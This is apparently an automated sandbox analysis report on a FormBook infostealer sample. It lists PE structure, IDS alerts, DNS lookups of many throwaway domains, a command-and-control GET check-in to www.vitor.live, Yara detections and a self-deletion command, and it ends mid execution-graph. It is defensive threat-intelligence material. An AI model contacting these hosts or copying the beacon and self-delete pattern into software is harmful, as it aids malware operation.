                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al

                                                                                                                                          Data Directories

                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbb9c80x53.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x1200.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                          Sections

                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x20000xb9a240xb9c00ab30b3c9266d6c39eb1e6bb4cc257491False0.8683638437920592data7.718614846166296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .rsrc0xbc0000x12000x12000c4344271a7741e464863f6a2a9e6332False0.6525607638888888data6.697180142465721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .reloc0xbe0000xc0x20044e1609da105b9575c7ad24e1c050049False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                          Resources

                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_ICON0xbc0c80xceePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.7616314199395771
                                                                                                                                          RT_GROUP_ICON0xbcdc80x14data1.05
                                                                                                                                          RT_VERSION0xbcdec0x36cdata0.4440639269406393

                                                                                                                                          Imports

                                                                                                                                          DLLImport
                                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                                          Network Behavior

                                                                                                                                          Suricata IDS Alerts

                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2025-01-10T15:51:40.551018+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450007103.224.212.21380TCP
                                                                                                                                          2025-01-10T15:51:40.551018+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450007103.224.212.21380TCP
                                                                                                                                          2025-01-10T15:51:40.551018+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450007103.224.212.21380TCP

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 10, 2025 15:51:40.053059101 CET5000780192.168.2.4103.224.212.213
                                                                                                                                          Jan 10, 2025 15:51:40.057914019 CET8050007103.224.212.213192.168.2.4
                                                                                                                                          Jan 10, 2025 15:51:40.058053970 CET5000780192.168.2.4103.224.212.213
                                                                                                                                          Jan 10, 2025 15:51:40.058109999 CET5000780192.168.2.4103.224.212.213
                                                                                                                                          Jan 10, 2025 15:51:40.063122988 CET8050007103.224.212.213192.168.2.4
                                                                                                                                          Jan 10, 2025 15:51:40.545497894 CET5000780192.168.2.4103.224.212.213
                                                                                                                                          Jan 10, 2025 15:51:40.550776958 CET8050007103.224.212.213192.168.2.4
                                                                                                                                          Jan 10, 2025 15:51:40.551018000 CET5000780192.168.2.4103.224.212.213

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 10, 2025 15:49:37.343482018 CET6134853192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:49:37.352560043 CET53613481.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:49:57.155132055 CET6097153192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:49:57.164133072 CET53609711.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:50:17.717585087 CET6253853192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:50:17.727824926 CET53625381.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:50:37.954613924 CET5793653192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:50:37.972253084 CET53579361.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:50:58.546670914 CET5838353192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:50:58.558268070 CET53583831.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:51:19.265645027 CET5400453192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:51:19.274790049 CET53540041.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:51:39.742948055 CET6087453192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:51:40.050163984 CET53608741.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:52:01.263598919 CET5055653192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:52:01.274040937 CET53505561.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:52:22.655673981 CET5185853192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:52:22.667599916 CET53518581.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:52:43.488162041 CET5584553192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:52:43.497450113 CET53558451.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:53:04.609961987 CET6373753192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:53:04.624939919 CET53637371.1.1.1192.168.2.4
                                                                                                                                          Jan 10, 2025 15:53:25.937292099 CET5400053192.168.2.41.1.1.1
                                                                                                                                          Jan 10, 2025 15:53:26.300749063 CET53540001.1.1.1192.168.2.4

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Jan 10, 2025 15:49:37.343482018 CET192.168.2.41.1.1.10x2388Standard query (0)www.ealthcare-trends-60670.bondA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:49:57.155132055 CET192.168.2.41.1.1.10xa52bStandard query (0)www.ental-health-69511.bondA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:50:17.717585087 CET192.168.2.41.1.1.10xa1a2Standard query (0)www.wistlnc.netA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:50:37.954613924 CET192.168.2.41.1.1.10x5e77Standard query (0)www.armanshop.xyzA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:50:58.546670914 CET192.168.2.41.1.1.10xe6d0Standard query (0)www.ehills.shopA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:51:19.265645027 CET192.168.2.41.1.1.10x9e42Standard query (0)www.uy-smart-tv-nl.todayA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:51:39.742948055 CET192.168.2.41.1.1.10xce7aStandard query (0)www.vitor.liveA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:52:01.263598919 CET192.168.2.41.1.1.10xdfa9Standard query (0)www.raceg.cyouA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:52:22.655673981 CET192.168.2.41.1.1.10x3c89Standard query (0)www.cctofi.cpaA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:52:43.488162041 CET192.168.2.41.1.1.10x26e8Standard query (0)www.onnorbell.designA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:53:04.609961987 CET192.168.2.41.1.1.10x81b3Standard query (0)www.orean-course-289113002.zoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:53:25.937292099 CET192.168.2.41.1.1.10xbb8aStandard query (0)www.ransportationmwmptpro.topA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Jan 10, 2025 15:49:37.352560043 CET1.1.1.1192.168.2.40x2388Name error (3)www.ealthcare-trends-60670.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:49:57.164133072 CET1.1.1.1192.168.2.40xa52bName error (3)www.ental-health-69511.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:50:17.727824926 CET1.1.1.1192.168.2.40xa1a2Name error (3)www.wistlnc.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:50:37.972253084 CET1.1.1.1192.168.2.40x5e77Name error (3)www.armanshop.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:50:58.558268070 CET1.1.1.1192.168.2.40xe6d0Name error (3)www.ehills.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:51:19.274790049 CET1.1.1.1192.168.2.40x9e42Name error (3)www.uy-smart-tv-nl.todaynonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:51:40.050163984 CET1.1.1.1192.168.2.40xce7aNo error (0)www.vitor.live103.224.212.213A (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:52:01.274040937 CET1.1.1.1192.168.2.40xdfa9Name error (3)www.raceg.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:52:22.667599916 CET1.1.1.1192.168.2.40x3c89Name error (3)www.cctofi.cpanonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:52:43.497450113 CET1.1.1.1192.168.2.40x26e8Name error (3)www.onnorbell.designnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:53:04.624939919 CET1.1.1.1192.168.2.40x81b3Name error (3)www.orean-course-289113002.zonenonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Jan 10, 2025 15:53:26.300749063 CET1.1.1.1192.168.2.40xbb8aName error (3)www.ransportationmwmptpro.topnonenoneA (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • www.vitor.live

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.450007103.224.212.213802580C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 10, 2025 15:51:40.058109999 CET164OUTGET /m25s/?RR=ejXsf9CDJtAn3y938lXanCHlJWOupDiK8G2VK70kBEvHSxoyO9pX1brU4xQC+L5tXqcG&2d2x=dTjPadN8ifyHSjI HTTP/1.1
                                                                                                                                          Host: www.vitor.live
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii:


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:09:48:57
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Users\user\Desktop\n0srYVYMDI.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\n0srYVYMDI.exe"
                                                                                                                                          Imagebase:0xf20000
                                                                                                                                          File size:766'464 bytes
                                                                                                                                          MD5 hash:7D311CDCEDA373FD94310919B7BDC784
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:09:48:59
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Users\user\Desktop\n0srYVYMDI.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\n0srYVYMDI.exe"
                                                                                                                                          Imagebase:0xc40000
                                                                                                                                          File size:766'464 bytes
                                                                                                                                          MD5 hash:7D311CDCEDA373FD94310919B7BDC784
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:09:49:00
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                          Imagebase:0x7ff72b770000
                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:09:49:03
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\cmd.exe"
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:09:49:07
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:/c del "C:\Users\user\Desktop\n0srYVYMDI.exe"
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:09:49:07
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Disassembly

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:9.5%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:243
                                                                                                                                            Total number of Limit Nodes:15
                                                                                                                                            execution_graph 19139 161f8a0 DuplicateHandle 19140 161f936 19139->19140 19148 161d5c0 19149 161d602 19148->19149 19150 161d608 GetModuleHandleW 19148->19150 19149->19150 19151 161d635 19150->19151 19152 7d062a7 19160 7d06c50 19152->19160 19178 7d06c4b 19152->19178 19196 7d06c19 19152->19196 19215 7d06bd8 19152->19215 19234 7d06b57 19152->19234 19254 7d06c41 19152->19254 19153 7d062b6 19161 7d06c6a 19160->19161 19274 7d07440 19161->19274 19279 7d0795e 19161->19279 19284 7d076bd 19161->19284 19289 7d0723d 19161->19289 19297 7d07855 19161->19297 19302 7d076d0 19161->19302 19310 7d0706f 19161->19310 19315 7d0736b 19161->19315 19319 7d0702b 19161->19319 19324 7d0722a 19161->19324 19329 7d0712a 19161->19329 19334 7d07747 19161->19334 19339 7d07225 19161->19339 19344 7d071e2 19161->19344 19349 7d071a1 19161->19349 19162 7d06c8e 19162->19153 19179 7d06c4c 19178->19179 19181 7d076d0 4 API calls 19179->19181 19182 7d07855 2 API calls 19179->19182 19183 7d0723d 4 API calls 19179->19183 19184 7d076bd 2 API calls 19179->19184 19185 7d0795e 2 API calls 19179->19185 19186 7d07440 2 API calls 19179->19186 19187 7d071a1 2 API calls 19179->19187 19188 7d071e2 2 API calls 19179->19188 19189 7d07225 2 API calls 19179->19189 19190 7d07747 2 API calls 19179->19190 19191 7d0712a 2 API calls 19179->19191 19192 7d0722a 2 API calls 19179->19192 19193 7d0702b 2 API calls 19179->19193 19194 7d0736b 2 API calls 19179->19194 19195 7d0706f 2 API calls 19179->19195 19180 7d06c8e 19180->19153 19181->19180 19182->19180 19183->19180 19184->19180 19185->19180 19186->19180 19187->19180 19188->19180 19189->19180 19190->19180 19191->19180 19192->19180 19193->19180 19194->19180 19195->19180 19197 7d06c38 19196->19197 19198 7d06c4c 19196->19198 19197->19153 19200 7d076d0 4 API calls 19198->19200 19201 7d07855 2 API calls 19198->19201 19202 7d0723d 4 API calls 19198->19202 19203 7d076bd 2 API calls 19198->19203 19204 7d0795e 2 API calls 19198->19204 19205 7d07440 2 API calls 19198->19205 19206 7d071a1 2 API calls 19198->19206 19207 7d071e2 2 API calls 19198->19207 19208 7d07225 2 API calls 19198->19208 19209 7d07747 2 API calls 19198->19209 19210 7d0712a 2 API calls 19198->19210 19211 7d0722a 2 API calls 19198->19211 19212 7d0702b 2 API calls 19198->19212 19213 7d0736b 2 API calls 19198->19213 19214 7d0706f 2 API calls 19198->19214 19199 7d06c8e 19199->19153 19200->19199 19201->19199 19202->19199 19203->19199 19204->19199 19205->19199 19206->19199 19207->19199 19208->19199 19209->19199 19210->19199 19211->19199 19212->19199 19213->19199 19214->19199 19216 7d06bf5 19215->19216 19217 7d06bfd 19216->19217 19219 7d076d0 4 API calls 19216->19219 19220 7d07855 2 API calls 19216->19220 19221 7d0723d 4 API calls 19216->19221 19222 7d076bd 2 API calls 19216->19222 19223 7d0795e 2 API calls 19216->19223 19224 7d07440 2 API calls 19216->19224 19225 7d071a1 2 API calls 19216->19225 19226 7d071e2 2 API calls 19216->19226 19227 7d07225 2 API calls 19216->19227 19228 7d07747 2 API calls 19216->19228 19229 7d0712a 2 API calls 19216->19229 19230 7d0722a 2 API calls 19216->19230 19231 7d0702b 2 API calls 19216->19231 19232 7d0736b 2 API calls 19216->19232 19233 7d0706f 2 API calls 19216->19233 19217->19153 19218 7d06c8e 19218->19153 19219->19218 19220->19218 19221->19218 19222->19218 19223->19218 19224->19218 19225->19218 19226->19218 19227->19218 19228->19218 19229->19218 19230->19218 19231->19218 19232->19218 19233->19218 19235 7d06bd7 19234->19235 19236 7d06b75 19234->19236 19235->19153 19237 7d06b7e 19236->19237 19239 7d076d0 4 API calls 19236->19239 19240 7d07855 2 API calls 19236->19240 19241 7d0723d 4 API calls 19236->19241 19242 7d076bd 2 API calls 19236->19242 19243 7d0795e 2 API calls 19236->19243 19244 7d07440 2 API calls 19236->19244 19245 7d071a1 2 API calls 19236->19245 19246 7d071e2 2 API calls 19236->19246 19247 7d07225 2 API calls 19236->19247 19248 7d07747 2 API calls 19236->19248 19249 7d0712a 2 API calls 19236->19249 19250 7d0722a 2 API calls 19236->19250 19251 7d0702b 2 API calls 19236->19251 19252 7d0736b 2 API calls 19236->19252 19253 7d0706f 2 API calls 19236->19253 19237->19153 19238 7d06c8e 19238->19153 19239->19238 19240->19238 19241->19238 19242->19238 19243->19238 19244->19238 19245->19238 19246->19238 19247->19238 19248->19238 19249->19238 19250->19238 19251->19238 19252->19238 19253->19238 19255 7d06c4a 19254->19255 19257 7d06bfb 19254->19257 19255->19153 19256 7d06bfd 19256->19153 19257->19256 19259 7d076d0 4 API calls 19257->19259 19260 7d07855 2 API calls 19257->19260 19261 7d0723d 4 API calls 19257->19261 19262 7d076bd 2 API calls 19257->19262 19263 7d0795e 2 API calls 19257->19263 19264 7d07440 2 API calls 19257->19264 19265 7d071a1 2 API calls 19257->19265 19266 7d071e2 2 API calls 19257->19266 19267 7d07225 2 API calls 19257->19267 19268 7d07747 2 API calls 19257->19268 19269 7d0712a 2 API calls 19257->19269 19270 7d0722a 2 API calls 19257->19270 19271 7d0702b 2 API calls 19257->19271 19272 7d0736b 2 API calls 19257->19272 19273 7d0706f 2 API calls 